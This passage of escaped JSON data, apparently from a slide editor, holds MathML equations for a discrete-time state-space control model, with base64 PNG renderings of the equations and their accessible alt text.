48bXRkPjxtbj4xMTwvbW4+PG1vPi48L21vPjxtbj40NzY1PC9tbj48L210ZD48L210cj48L210YWJsZT48L21mZW5jZWQ+PC9tc3R5bGU+PC9tYXRoPnK9/V0AAAAASUVORK5CYII=\&quot;,\&quot;slideId\&quot;:300,\&quot;accessibleText\&quot;:\&quot;A space equals thin space open square brackets negative 0.5552 close square brackets comma space space B equals space open square brackets table row cell 12.987 end cell cell 11.4765 end cell end table close square brackets\&quot;,\&quot;imageHeight\&quot;:16.75213675213675},{\&quot;mathml\&quot;:\&quot;&lt;math style=\\\&quot;font-family:stix;font-size:16px;\\\&quot; xmlns=\\\&quot;http://www.w3.org/1998/Math/MathML\\\&quot;&gt;&lt;mstyle mathsize=\\\&quot;16px\\\&quot;&gt;&lt;msub&gt;&lt;mi&gt;A&lt;/mi&gt;&lt;mrow&gt;&lt;mi&gt;T&lt;/mi&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;/mrow&gt;&lt;/msub&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;msup&gt;&lt;mi&gt;e&lt;/mi&gt;&lt;mrow&gt;&lt;mi&gt;A&lt;/mi&gt;&lt;mo&gt;.&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;T&lt;/mi&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;/msub&gt;&lt;/mrow&gt;&lt;/msup&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#x2009;&lt;/mo&gt;&lt;mfenced open=\\\&quot;[\\\&quot; close=\\\&quot;]\\\&quot;&gt;&lt;mrow&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;mo&gt;.&lt;/mo&gt;&lt;mn&gt;0028&lt;/mn&gt;&lt;/mrow&gt;&lt;/mfenced&gt;&lt;/mstyle&gt;&lt;/math&gt;\&quot;,\&quot;base64Image\&quot;:\&quot;iVBORw0KGgoAAAANSUhEUgAAA8YAAACVCAYAAACaY+MFAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAABGJhU0UAAABqbUMa2AAAI9tJREFUeNrt3QGEFtv7wPHHWitJJFkriZWsJJEkyYokSdaSlSSJJEkSuZIkkSRJIklWsiRZuRK5VpJEklxJJMmVtSTJWit+v3nuO2939m3mzJl558zMznw/HP/f/7bvzJwz8z7veWbOnCMCAIgz6pX/eWW4BnW95Ne1rGWAyxEAAAAA8rU1kJQ9rUF935U4Kf7plS4uSQAAAADIT4dX3gcSs6mK13exISnVdrjtlf1e2eGV9V6ZH5Kono5JbOdEtHO3Vwa9ctMr0xGfH+OSBAAAAIB8/RGSnC2tcH0PhNT3rlfWJtjGmCExfmK5DW3j5yGfP8ElCQAAAAD56fHKD6nXO66jgXp+l8aT4SQ6pfFUOCoxPpVgWwu88qHl86u5LFEBebx2AADER+IjAGTiTkRArepTSx3O3BzCPOmVdSm2MRDzY5R0m3sDnx3nkgQdPzp+AIiPxEcAyE+/IaCOVLTOwUnG9qbcxlVDu31Nsb3gE+hhLkvQ8aPjB4D4SHwEgHzok9O/DQH1dUXr3Vym6c82tvHOwQ2Fb/7nB7k0QcePjh8A4iPxEQDycUzilwzqqGC93/l1W57y8z0x7bY75XYn/OOaz6UJOn50/AAQH4mPAOCeLhn03SKorqhYvXv9et1oYxv7YtqsJ+V2dQK0p1yaoONHxw8A8ZH4CAD5uG0ZVKs2rLe5TFNfG9sYETfDz/Vp8WkuTdDxo+MHgPhIfAQA99YHguY/XrlnCKrnKlZ3neSqv81tfDO014U2jksn3VrD5Qk6fnT8ABAfiY8A4N4bmfk+rGlo8F2aa4Y1MT9Cm2kiwLrjBwAgxgJAIQ4FAuYz/79tNQTVjzTZDMcNbaVrInfQRACdNgAgxgJAeS2Uxhq7zYC5yv/vXVK/manTemRoq/s0D0CnDQCIsQBQbtcDwfJ6y7+NGwLrepruX/oe8LShnQ7SRACdNgAgxgJAea0OBEqdPGphy7/fNwTWIZrvX1tjfoCW00QAnTYAIMYCQHm9CgTKIyH/fsEQWK/QfP+6ZGijDzQPQKcNAIixAFBe+wNB8m3E3wwJ787GeW1oo2s0D0CnDQCIsQBQTgu8MhEIkpsi/m6VIbBO0IyyKObHZ4AmAui0AQAxFgDK6YrYrUmsM0//NATXrpq3o+mJ+jTtA9BpAwBiLACU08pAcJzyypKYv39jCK6ba96Wtw1t8xeXGkCnDQCIsQBQTs8CwfG0xd+PGILrnpq35RdD25zgUgPotAEAMRYAymd3IDB+9Moci88cMwTXGzVuy76YH541XG4AnTYAIMYCQLnM88o/gcA4aPm5AUNwfVTj9jxiaJdxLjeAThsAEGMBoHyCaxI/SfC5bkNw/V7j9hw1tMswlxtApw0AiLEAUC467Lc5u7T+3xUJPz9pCLALatieOlv3tKFNhrjkADptAECMBYByGQsExEspPv/YEGC31bA9Nxna42dNbxYAdNoAgBgLAKW1S2a++zo/xTZuGgLs4Rq26TlDe7zgkgPotAEAMRYAymOuVz4HguHBlNvZI7xPG/Tc0B5nuewAOm0AQIwFgPI4ZxEg2y1PatamOrv3T0N79HPZAXTaAIAYCwDlsCwmgcuqTNWsXQcNbaGTlHVw6QF02gCAGAsA5fAwEAQ3ZrC9T4Ygu6RG7Wp633qEyw6g0wYAxFgAKIcdgQD4MKNt3jcE2YEate0HQzsc4NID6LQBADEWAIrXFUje0qxZHOWqIcger0nbLov5sVnC5QfQaQMAYiwAFO90IPjdyHC7ppmp79SkbQ8Y2uA9lx5Apw0AiLEAULyl0pgMqzkp1uIMt73NEGRf16R97xna4DKXH0CnDQCIsQBQvFFxt57uHEOQnZbqz8as9fthaIPtXH4AnTYAIMYCQLGCT3QnvDLfwT6+GwLtioq37/qYGwOdXIIAnbYWC6Rxk/I6px0AMRYA3AtOuKXlqKP9PDIE2sGKt/EpQ90fcgkCdNoC9MakzvfQHGXyndOemt50PSKNuSxeeuWbNF4V0huSunb8uDRWTbjglc1S3tFLs70eawLHP+aVr/5xT/v1+OH3Q7QOF6WxWkVXSc+Fvma20yvX/ON97x//VKA+3/zzpMswHvPKWmIsAMwOZwIB76PDH9RhQ6A9W/E2HjPU/QiXIECnzTNPGjfRvrXUicQ4+Y2FE155Z3G9tBYdMXXOKz3UI5MEUvsXn1Mcf3M0lSae/SU4F91e+UMac6L8L2X56H+/55f8+1OLxDg40+wJYiYAX580lmVqxodDDvd1xBBo71W4jbta2ri1rOIyBGrdaZvrlZPSeIoWVicSY3snQm4sBIv+22NpPM2bMvzdpJ/EdFCPVAn9RT+x/V9G5ZlXVheUEF+NqYs+LX7jn49nYn5trHnuyrxMZeUT48X+F6NZoRHiJgDfy0BsmBK3Q5cGDYH2aw511QnA9CbhZ/9HTu/CH8hhv7sM9Z7iEgRq22mb43eQJ2LqRGIcb7lEP8374rdzd8jnVvlJXFRy+corvdTDWr+kf0IcV376v+F52R9xc0L7D7ekMdx7TsRndfSHDrd+aKjPcynHyITaJcYjUs+lUQCYnWyJDa5vmg3EBFuXE3Dp3fInEfu94Ljejwq+IQCQGJeL3oA85ic6NgkBibHZVol+SvdAGpOYxdGk8YUhTm+kHrH2iXl0VFblgSEhzYJu+27Evu+mSGb1SfffhpsdK4mx+emPuONS9aVRACSPDacc73NXTLB1eSf4cMy+XU2MsZkOL0Cnzaezzx9NkBATJ+INGZKx4RQJUdSNTB15uYl6RDqUQ0IcLI/EzWoO+qT3qWQ/H4hu93HEdscl31EJtU2MOwx3KKq+NAqAaDo7ZNi7bJcd7/epxE8WstDRvu/H7Pu8g32ul+h3BoNlGZckUOlOm/bH9OZc2iGmJMbhTKOQnrSRwLwxnIc11OM3O3JOitPeMLARdUPhTEZJd1Re9t7/d2KsQ8ekvkujAAjvnB2R6KFa+t7MAcl+RIkOE3pg+UP3UtwMK4pLjC9n2MYbvHJT7IeU6RIVQyX6UQRIjLOLBwe98kn+G7GnNwhvSON90GckxqnpjcdJiZ4MaXEb2+6T6MmW/vHKIurxyzJDn0KTvXN+4t/d0rfQ1wlW+PnIFWnM2JwmOd6X4bk4GbGPLF9BXWHoG1wixrqjF7tpNruqL40CYKbTEj9TYnCold41vS3p3uPp9D+ryfBXSfdjp8mivvOc1YzNx2L2185yEHP8Y9X3uqakvTvgeo50Qo57Uo4lKgAS4/Teyn83/I5EJCI3SYxT9XFNw9GzWH3lrJiH8VKPhrD3mfWp6OYU2+r3f/+S/GZqHyOLkWa9ht/vrB8mXpfoycXKMKS6kolxXKC9S1wFauVxykQtzVPMLsluqNS2jOrfJdETktxqc9vzxM0wsf1ctsCs7rTpDcm4V9e6SYwT+9PQVppoZjExk8Z10wOmA9Tj39EQrdvTp7/tjjrT7U4m+K28mEE7XZPoBwVZj6JbJ+5Hr5EYB6y2qNR74iqAmtEOwgW/w6F3hvWu9mGaBSAxLthbEmNreU7ieF7cPamc7fXQtbdblxnLcjSq7RwdzeS1nVeROiX6afFjR9fxhOGGCDE2Y6/Ebi0wZqYGAAAkxsUaJTG2ok9QP8f0bRdnuL+lMefleo3r8Ye4X+5xk9jP1dHOCCvT5Ge3HV3LpnlPip6Qs1Ix9oDYDz1YKwAAACTGRYqbHJDEODwZay1/Odjnk5gEdnkN69HRktjrxFmuJo88bZnT3GtjH6Yn6jcc1cv0yusOYmw2dOHviQSJ8RAxFgAAkBiTGJecDncdj2mngw72ezhmnzdqWI/W5Zm2ODzvOj/IJ3H7Hv6I5P/E+EKJ87PKxNhLkmxilwvEWQCAhbV+x0nnp9D3uXQJEJ3QRWce1zv626Uxw6reoNX1Hh/RZKDTRmKcoX0W536xg/0ui9mnxsLumtUjeL2O5nDuj4ldXtOVcvumSdDuO6rTOcM+dxFj29e6Lta0RcXuCwAA0fRduNsyc6IWfR+rwy86u+adkN+XYZoOdNpIjDP0VOKX+HMl7onlqRrVozOQY2je0ZfDuV8kdu8ab3KQGP9wVKfrhn3uJMa2L/juwBf/4o6r2GfiLAAgQYfhUMTfnWz5u2M0Hei0kRhnZInFeXd5M+6OZLPSSxXqMSDF3AB9Ie6Wd3wg+c/JZBq+vZUY257WKd91mMZ2sRt20MlvLAAgxM6Q34z5hr8P3qAdoPlAp43EOCOHLc77Xof7t5nYdm1N6hF8bbMvx2vgpsPEeCRmuy7WFn5t2N+cgr9vszrG6jpiwZnhXvr/fYFlYryR31gAQIgHCX8QNwX+biXNBzptJMYOY1Fr2eBw/5ss9n+2JvVo3gDNex4Jm6Q+7ZPWMxK/TnJ3hnXRG8xRQ8NfE2Pb0/ry9urAv/2wqNwuAQDgd2G/IXGTm0z4P/gdNB/otJEYZ0BjyVRM+7iOOV0W193LmtTjljTeg96S83Ww0+LY096Q3SH5DnE3TcB2qgTfuVkbY3tl5iRbrVOt/2lRuWv8xgIAQoTd0Y6b3OSuV/6h6UCnjcQ4I+stznkeMeebRVI7rwb1KMqAw5sKXWI3aXFWDxNfRmxfb5x0l6CtZ22MDSa+eqEvbPn3a8LM1ACAdMJmMI171+oMvyug00ZinKFDFuf8Qc597qiyowb1KGti/LbN7d+2aBcdRbWuzf2Ynk6fKklbz8oY2zq51uGQv9ltUbmv/MYCAEJcj+gYmCbg0pFMG2g60GkjMc7IHSl2JuckidPZGtSjKIOO22612M3NpHlT2lmqdf6nzxHbHSPGpqczSX8IHOCbiL9bL24XxAbQnsXSGJqj7+w88gOuDqXRIT2TfgC9J40bX4toLuRszSzqNIHEmMS4mp5bnPPTORzHeWlvFGZV6lGUPTHHPJTBPkbELm/S72PSNZM7/H5e2Pb02phPjE2vdY3ifkMCbbMg9lYBkBdNcI+Lear+qHdPTtJ8yNmDiGuxl6YBnTYS4xxMWZzz3SVIzLR8rkE9inLWcLz6MCGLJY70/d7xBP2yI5bb7TR8x3Voe9ne6Z5VMVafMAVnCr0T8/fvpNg10wA0aCJxXX6f4EGXPtCnxs05AnQEx36/IxT2fb1OUyLn6zasQ/dMil9rESTGJMbVNtcyQcnjndhBi+OImgCqKvUokulp7p0M97NJkj20GJXf53gKWij/LXHVWsr6sGNWxdjgOwo//ETZ5K5FBW/wOws4o0Hxkvw+ekNfh+g3fO6I4Tu7hWZFjqKuxRGaBnTaSIwd6rdMTvIY+bjN8lj6KlyPIr01HGt/xvvanzA51tnEt4dsR19pDZvEUuuytsTfu1kTYze2HNgJi8+ctqjgIwHggq67FzYsR98bjhs60234zt6laZGz0Yhr8TBNAzptJMaODIhdYrKx5El6VepRlHmG43zlaJ+nEibHzZvFPf7xXpLw15A0Lyv73E6zIsbqkIa/Awf1TuyGOdh8Gev87kpdbE7xBZ+tpQyTRugkClEzUF7NIDjxnUURHZO3ET/0fRWqJ7GSxJjEuDx2W17LebyjOd/yWHZWuB5FMQ3/HnC43zTJsY7m/UfCl+KaLXNzzIoYe0zSDaVcankiF9DvIzGms5eJ5RL9bv/VjILTNJc0ChC10sFYhepIrKTTRmJcHrZDWvN4AjfH8lj2VrgeRbkVcYwvCsi/khZ9or1xln3vSh9jdRbbrzJzBrMkbGbC20afj8SYzl7bNrZ8V1snaEhisaGOk1zSKEjUvBUbK1I/YiWdNhLj8rhkeS3nMVFUl+WxnK1wPYrQKdGTkeb1nu4eSR9nL8vsm6iy9DH2hsx8UpT0UfxfFpU8SH+PxJjOXlu2+glr2DHpaxBJh0gNSf7v1ABx+iKuyZvESmIlnTYSY4f93zKcc5tjuVbhehRhb0l+c7YaEvS48t4r64ix2VjdcjBnUmzjlkUlh+nvkRjT2WsrYE5L9PrDy1Ns856hjle4pJExHepnu4bm45Br8hOxklhJp43EmMQ4dKWXqtSjCM9Djk0nNV1YwLGskfD3h23LaWJs+14FDuSjpHscv8+iklV6Rwx09vKk711OGo7neIpt6jDqn1LszJWoF51N03YtyLD35ary3juxkk4biTGJMYlxORLjDRHHtr3AY+qOSNZty5i/DWJsCq2dj8GU29lqUckp+oUkxnT2EtPJ7SYMx/I65XavONgmYKI/1h8s/7ZXqvveO7GSxJjEmMSYxLgcifGzkOO6XvAxaVI+3mbs/SKNhyrE2AQWtDT84za2ZfuifQ99Q8DaXJm5hFpYWZNiuyvF/LR4M00PB5rvTi22+NuOkOvyDU0IEmMS44xdr0hCWZV65ClsudlXUtwawLrfyxI+WipNcqyf213S710pY+zFwAFoJ3lFm9v7YlHR7QLAVty7+3dSbLPLTzCitnmTZoejH/zmNXY05Q/nZZoRJMYkxhm7OgsTyqsVrkde9MHDx5bj0dF5Sws6Ht3vy5A20t9LvZn8WNI/PT5JjI23QmY+MbqYQ9DVcozfW8DKzpjvkn5/l6XY7rBhmxqU59D0cGBl4Dp7Z/H3C0Kuz9U0I0iMSYwzdmAWJpSnK1yPvFwM6VNtKuhYtsjvy3Dq097Wh4n7Jf2s1eeJsWZjMnMc+rwMtnneoqK3+b0FrJKCuBEYIym2e0bMU/130/RwpHXIWtzyfa03hhjJABJjEmMXbNePzWN4re1riXsrXI88hE24tb+gYzkk4UOgt0b8fTtPj8s0Y3WpYuyulp3vyWi7Oy0q+pLfWyDWFYvvUtJ3i88ZtvU3STEca53oUSfS6o/4206ZuVrCE2EkA0iMSYzdGLRMKubmcCxzLY9lZ4Xr4Zo+ePgk7S9Tm4WLEe1iMxFy2qfHe0ryvStNjNWL9XNgx88z3PZKYWZqoF19Yp4YK+n3VhOK24ZtjUo2I0YAkxuB34Af8t/QtXP+b4fSCbc2+Ilw89+149BF84HEmMTYEZtVVbQsz+FYFlkey9YK18O1USnHBGDXItokSZK+JPB7aVumAr+5xFjPWSl++YZlAiBt5yXJkB99qhw1q7UmJ4dpbuTkrt8B6fD/f30qrMOrdYi0vnM86f9ga+d8zO8cLKXZQGJMYuzYAsu+65YcjmWT5bH0VrgeLp1q2f/dgq65qCfFaR9Wnk6Yh5VhSc5SxNhev+NRdGI8wG8uEKpP7KbfjxtWulAaM/hGPXkeJekAABJjEuN//ZRyrKqy3eI49Fg7Kl6PPI7pQUHX2j5De7SzOtA2STa0en/B37lSxNgHJUiKyzptOFAG16S9Cez05pfeiZyU6LuRG2lmACAxJjH+5W+Lcz6Uw3HYzNXzqQb1yNqalqTxkTRGLeWt19A/G8monuOWudj7usfYbSVJirM6+UDVdBkCpmkYlA6f0juQY4bPPCQhBgASYxLjUCMW5/xQDsex3+I47tWgHlnS0XHBVT6eSnGTOZq+gxsy2seKBMnxlgK/c4XGWL0r8kFmDsV09Z7vGZkdY9uBstlr8d35x/9bHXKt7wfrlP1RQ6c+CO9pAgCJMYlxHJt3NPOYpOmGxXGcqUE9srKoJf/RUXNFTTZqelVuIuN9bRC7YfXDdY2xJ1t2dsnhvoakfO8VALPBqMV3R2eU/yTm5dD0x2YNzQkAJMYkxlZs3okdKcE5intHuCr1yIKOpnstMx/KLSzwGjuf8zk5YXEOJgpsj8JibI/8tzSGlm+OL4y1Yvf4foUAaNIbRdOSfMp9nab/qjTWvJtPMwIAiTGJcWLzLM75qxyO46XEP1iaW4N6ZHE+nwX2pysfLCr4GntraI/jjvb52uJ6WFK3GHunZUcncujg23TqBwVVs1nK8x6763I/47brt9in3tQ6Ko1Z3ZcLoy4AYmX9YiWJMYmxK28k/ma0a3Erx7yqUT3S0vlaHsvMSb56Cr625kgxq/XYjCDYXlCbFBJjN8rvwzC7cqjsZ4sKn6NvRGePzt4vRy32eZ1LDCBWkhiTGJMYO3HJ4ry7XHe312L/52tUjzT0gUFwBR6dl2VJCa6trTHtsbXAnGx3XWKsXhyt07bvK0nwLXJRbdDZK2Nnz2YmSUZZAMRKEmMSYxJjN2xGbrn8HbZZ4mh9jerRbl9KZ2ZeXpJrK65NNjvcd9wyoEWtZ5x7jG19AvUmx8rarMX6gb4RnT06e788sdhnH5cYQKwkMSYxJjF2Qh8oTcS00UWH+78sdqtS1KUeSQVnwv7qlVUlurZ2FZgYx02KfLoOMVZfMP8mxa1VtUeYmZrOHp29JL5Z7LOTSwwgVpIYkxiTGDtzJaaNnjjc9/MMk9mq1MPWxZbreF1O10uPn/PE5TNxibHLodRxIwj2FfRdyzXG3mrZ+FjOld1m+YO5TkBnj86empJqdsQAECtJjEmMZ4vVEv9Qx8VcPfMkft3ZFTWsh43g2s2T0phfKS93/f3GLZE5IMVMvqXmx+x7qOoxdn3IxvMeTjDX8gdzSEBnj86eiN1C7ACIlSTGJMYkxm69KiCJiRvu+rTG9TAJvjaqS17mOTq2+d6wzauq62La5WiBOdmmKsfYsAm3hguq8A+LSl8UAIonxgBAYkxiXLy9Me00XMC5GaxxPaLsa9n2jhyvEZ15+6u/3yOW+dm0oV3uODzWRWIeOVDUa3q5xNg/WjaqJ2FpQRV+LNW9kwxkzeYd425H+16Y8w8KAJAYkxiXlSYxpiVudLhulsOQF8YkTe9qXo8wgy3b3pXj9aGJ5odAnrUgg7xo3OHxml5vfVLg98x5jF3qX+RlWfd02KLSE8Rf4F9/WnxfXCyvoO/6fPS3389pAAAS4xJZ7JWrXvkkjZFVE37fttfxfg/GtNXBDPd1PGZfu6jHb4le8PWzAzlej6sCSbGWkQSf3R/TPhscHfMRwz4PVznGht2JWFlghc+I3ftHi/j9BWbMqBhVbma8zx1+R6g5QR+zXgNAdRPjB7MsMdZE4avhWF0ucaNPW1+L+6efnX7SH7WfF9RjBn0fNvgQ8Jjja1Dbb5k03p0eld/ng9mcsI2+GNpoxFEdxiL2pyMV51U1xobdEXpVcEDbZ5kYDwqATRbfFR2y05PR/s61xIr5nAIAqHRi/G4WJcY9hqQ4eLwunxyvFvPEmFksc3M85jd/BfX4Zb38dzO/DOVjRvlasKzO+BpeYdjXiarG2GURF8r5giu8x/LCulnwcV6Scs/oOSCoi08W10O7dxR1WNrTwPZ0NkVGbQBAtRPjuRK/+oH+e0dJjveqZR/J9QSzR8X8XujCNpN/U6J3lHr8ssriRkne5VTKuowZtql9sjkZnveo95pfl+C77iTGzpXoIRJFP4k9ZXlhjRd8ct5JeZNiV+vMoZyOWl4XJ1NuX+9UBif5ekFSDAC1SIz3i93vy6aSHO8/lsc7mcOx3DLs/0HKbXbEJEg3qccvy/xcoWx99LSTG2u/66Nhu/cyOt8nI7avNxh6qxpjTRP2FP2k8WmCi2tfQce42HBM771y2/8x0XcxdQjH/JBE9XRMYjsnIpB0+zcvNGhEzeI3Rt+kVvS6eCP2d8lt7/BqR+dVyI/gPJocACqfGGus/2D52/K4JMc8naAPmccDhLuG/aeZ6HYkh8SoCvVYnOAmSZ6l3e9Jb0y92u2jRQ1t/+7nM5WLsfMkfhKFuwVW9kDCC2zcv/jLcJzabmsTbMN0p8x2GnS96/Rcyjf+H/nTO6O2w4V0rfArXtneEkC7/GT4REii/ZPrCgBqkxh3+32RJH0yHcZc9DBL29/BPId/X4lJAhdYno9HMW1PPRoWJbihk3cZyqB+OgT9lWEfWvdtKb7vUTc/dOmuVVWLsfrl1wW7P1qeuHsJk7x26LFt9veZ5iLT5FifHOc5M+5oy12UpGu5dor5nZ0k7x8sCAkAqwV1tE7cvEvzqmRBEQBIjLOn/YntfnLyQ9JPLKQj4rZIMa903ZJyPuHWJYe+SfQSpH94ZUnI53r99oz6rPZBd1OPX3RE3BspZ1L8NcObMTqq9LJF3+2QV/oM+dcW//s+acgHF1Ypxnb6lZpMeRI1MD70yp0Mv3h6TDrUWNfF0/ecpzO64HQ7L6UxPGODwxPSETjmST8ZSWogpi5Jt7lX8lnsG+WnowheZPSdeu9fWwCA6iXG2lf64nfYpxwlA1P+9nU/O3Oo0zKLPq8+mCjiAYI+6RuW+Bmzx/wSN5Oy9ncXU48Z/fMXUt75fy47OBd6HT+x/B5+9nO6x/5NjJ8xSfWWKsbYrgxPaFbDNLpyuPj2ODwhWwP7SZs0XI25o5TmZkPzAh8WoHFtppkgTm/66IiIHVKeWUYBgMQ4e5tzTgz25FQv7adFPfHWpLnoSWb1Cd41SbeEkB6/vtO7sgTXT9nq0SXlTYr/5/ic6SjfG9LeslQ//ByinxiLJJrLNP3ZxjbeSfbL6jSHp7C+M1qDpQ7N1xEan/0foym/6DXzxv+3s9IYQtdJkwEAnbZZrtdPvMb937txP3FYVqJjbA5lPef/Dr/3k5Pmb7T+7w/+v533/7aMN6yrUo8q6PAT22PSGO2rT5O/tvT99HzoE+OHfiJ82CsbZ9E5IcaWjCa1+nR2ecrP98Sc0LRD1pvDIuZzigAAoNMGAMRYuNLrN/qNNraxL+aE9qTcrt4BesopAgCAThsAEGPhUnOZpr42tmFau+11G9vVp8WnOUUAANBpAwBiLFzS9y/bfSn9m+FkXmjjuPQ9gTWcIgAA6LQBADEWZbYm5mRupokAAKDTBgAgxlbZcTFPXc8sfQAA0GkDABBjK+2R4UTep3kAAKDTBgAgxlaZvgc8bTiRB2kiAADotAEAiLFVtjXmRC7P8Vh0SagT0nhKrQt/T/lJ+2dpLAi+TcKHdd+U9paqAgCAThsAgBhbY5cMJ/FDTsegT63Pi/nJdbN89v9Wk2SdifsP/7/v41QCAECnDQCIsUjjteEkXsth/3O88lfLfse9cswrvfLfE+IlXjnslU8Rx7qdUwkAAJ02ACDGIqlFMSdxIIdjGG7Zpya+PYa/nxeSSOc95BsAADptAABibEUMGU6gDmvucrz/1SH7HbL43AJpDKlufuansKQUAAB02gCAGIsUbhtO4F857P9ayH47LT+7V2a+dwwAAOi0AQAxFol9MZzAEzns/20bF44+IZ4Q1loGAIBOGwAQY5FSX8wJXJPDMUyF7HdVgs83309mqSYAAOi0AQAxFokdMZy88ZyOIWx5posJPr/L/8x+TicAAHTaAIAYi6RGDSdvOKdjCFt6SZ8i91p+fq2wVBMAAHTaAIAYixT0/dxpw8kbyuk4RiL2/1zsZpnWWbOvemUZpxQAADptAECMRRKbDCdOlz5akNNx7DAcB+8NAwBApw0AiLFw5pzhxL3I8Tj0qfBnw7Ec51QBAECnDQCIsXDhueHEnc35WI7FXEgHOF0AADjttGVRAID4SHycVeZJY7h01Inrz/l4Or3yIeZiGuC0AQBAxw8AiI/IyqDhpE2K3aRXWdseczHpca3j1AEAQMcPAIiPyMJNw0kbKfC47sRcUF+80s3pAwCAjh8AEB/RLtOw5SLf59WZsD/FXFSPOX0AANDxAwDiI9qxLOakLSn4+FZ65XvMMe7hNAIAQMcPAIiPSOuA4YS9L8kxbou5sHR5pw5OJQAAdPwAgPiINO4ZTtjlEh3n6ZiLay+nEgAAOn4AQHxEUvqU9YfhhG0v2fG+MBzrPU4nAAAAACCp9YZEc1oa6wm7csErLxN+ZqXheL9yOgEAAAAASZ0yJJoPHe97xE++k74bfDfieKc4nQAAAACApMYMifERx/t+6O9nbcLPRU3ENcnpBAAAAAAk0eWVn4bEeJXj/TeXYDqe4rjDjvcNpxQAAAAAkMQuQ1LselhyR2Bfz1J8PuyYb3FKAQAAAABJPJLiJrLqbdlfX4LPzo845s2cUgAAAACArc1iXlfru+P9b2/Z30iCz+4JOd5XnFIAAAAAgC1doumrxC86vczhMYQlt1ssPqdDsP9u+Zy+J72G0woAAAAAiEsoN3jlppgn3AqWD14Z8so8B8dzQcKHb683fGaONJ4st35uF6cXAAAAAGBKJF9IYzKt/7VRdGj1c6/c80p/Bsc2ErEfTdrPy8x3jvXJ9SGvvA85pgFOMwAAAAAgyrw2k+Gosj+DY3sYSIQ1wZ1OsH/9zA2v9HCKAQAAAACz1YRX7sjMYdoLvTIojWWXdE3iSWk86f7hlXdeueuVg15ZRPMBAAAAqKL/A+LOoxP+4eDMAAABeXRFWHRNYXRoTUwAPG1hdGggeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTgvTWF0aC9NYXRoTUwiPjxtc3R5bGUgbWF0aHNpemU9IjE2cHgiPjxtc3ViPjxtaT5BPC9taT48bXJvdz48bWk+VDwvbWk+PG1pPnM8L21pPjwvbXJvdz48L21zdWI+PG1vPj08L21vPjxtc3VwPjxtaT5lPC9taT48bXJvdz48bWk+QTwvbWk+PG1vPi48L21vPjxtc3ViPjxtaT5UPC9taT48bWk+czwvbWk+PC9tc3ViPjwvbXJvdz48L21zdXA+PG1vPiYjeEEwOzwvbW8+PG1vPj08L21vPjxtbz4mI3gyMDA5OzwvbW8+PG1mZW5jZWQgY2xvc2U9Il0iIG9wZW49IlsiPjxtcm93Pjxtbj4xPC9tbj48bW8+LjwvbW8+PG1uPjAwMjg8L21uPjwvbXJvdz48L21mZW5jZWQ+PC9tc3R5bGU+PC9tYXRoPnTqB2cAAAAASUVORK5CYII=\&quot;,\&quot;slideId\&quot;:300,\&quot;accessibleText\&quot;:\&quot;A subscript T s end subscript equals e to the power of A. T subscript s end exponent space equals thin space open square brackets 1.0028 close square brackets\&quot;,\&quot;imageHeight\&quot;:16.10810810810811},{\&quot;mathml\&quot;:\&quot;&lt;math style=\\\&quot;font-family:stix;font-size:16px;\\\&quot; xmlns=\\\&quot;http://www.w3.org/1998/Math/MathML\\\&quot;&gt;&lt;mstyle mathsize=\\\&quot;16px\\\&quot;&gt;&lt;mi&gt;x&lt;/mi&gt;&lt;mfenced open=\\\&quot;[\\\&quot; close=\\\&quot;]\\\&quot;&gt;&lt;mrow&gt;&lt;mi&gt;k&lt;/mi&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/mrow&gt;&lt;/mfenced&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#x2009;&lt;/mo&gt;&lt;mfenced open=\\\&quot;[\\\&quot; close=\\\&quot;]\\\&quot;&gt;&lt;mrow&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;mo&gt;.&lt;/mo&gt;&lt;mn&gt;0028&lt;/mn&gt;&lt;/mrow&gt;&lt;/mfenced&gt;&lt;mi&gt;x&lt;/mi&gt;&lt;mfenced open=\\\&quot;[\\\&quot; close=\\\&quot;]\\\&quot;&gt;&lt;mi&gt;k&lt;/mi&gt;&lt;/mfenced&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mfenced open=\\\&quot;[\\\&quot; close=\\\&quot;]\\\&quot;&gt;&lt;mrow&gt;&lt;mn&gt;0&lt;/mn&gt;&lt;mo&gt;.&lt;/mo&gt;&lt;mn&gt;0648&lt;/mn&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mn&gt;0&lt;/mn&gt;&lt;mo&gt;.&lt;/mo&gt;&lt;mn&gt;0573&lt;/mn&gt;&lt;/mrow&gt;&lt;/mfenced&gt;&lt;mi&gt;u&lt;/mi&gt;&lt;mfenced open=\\\&quot;[\\\&quot; close=\\\&quot;]\\\&quot;&gt;&lt;mi&gt;k&lt;/mi&gt;&lt;/mfenced&gt;&lt;mo&gt;,&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mi&gt;y&lt;/mi&gt;&lt;mfenced open=\\\&quot;[\\\&quot; close=\\\&quot;]\\\&quot;&gt;&lt;mi&gt;k&lt;/mi&gt;&lt;/mfenced&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#x2009;&lt;/mo&gt;&lt;mi&gt;x&lt;/mi&gt;&lt;mfenced open=\\\&quot;[\\\&quot; 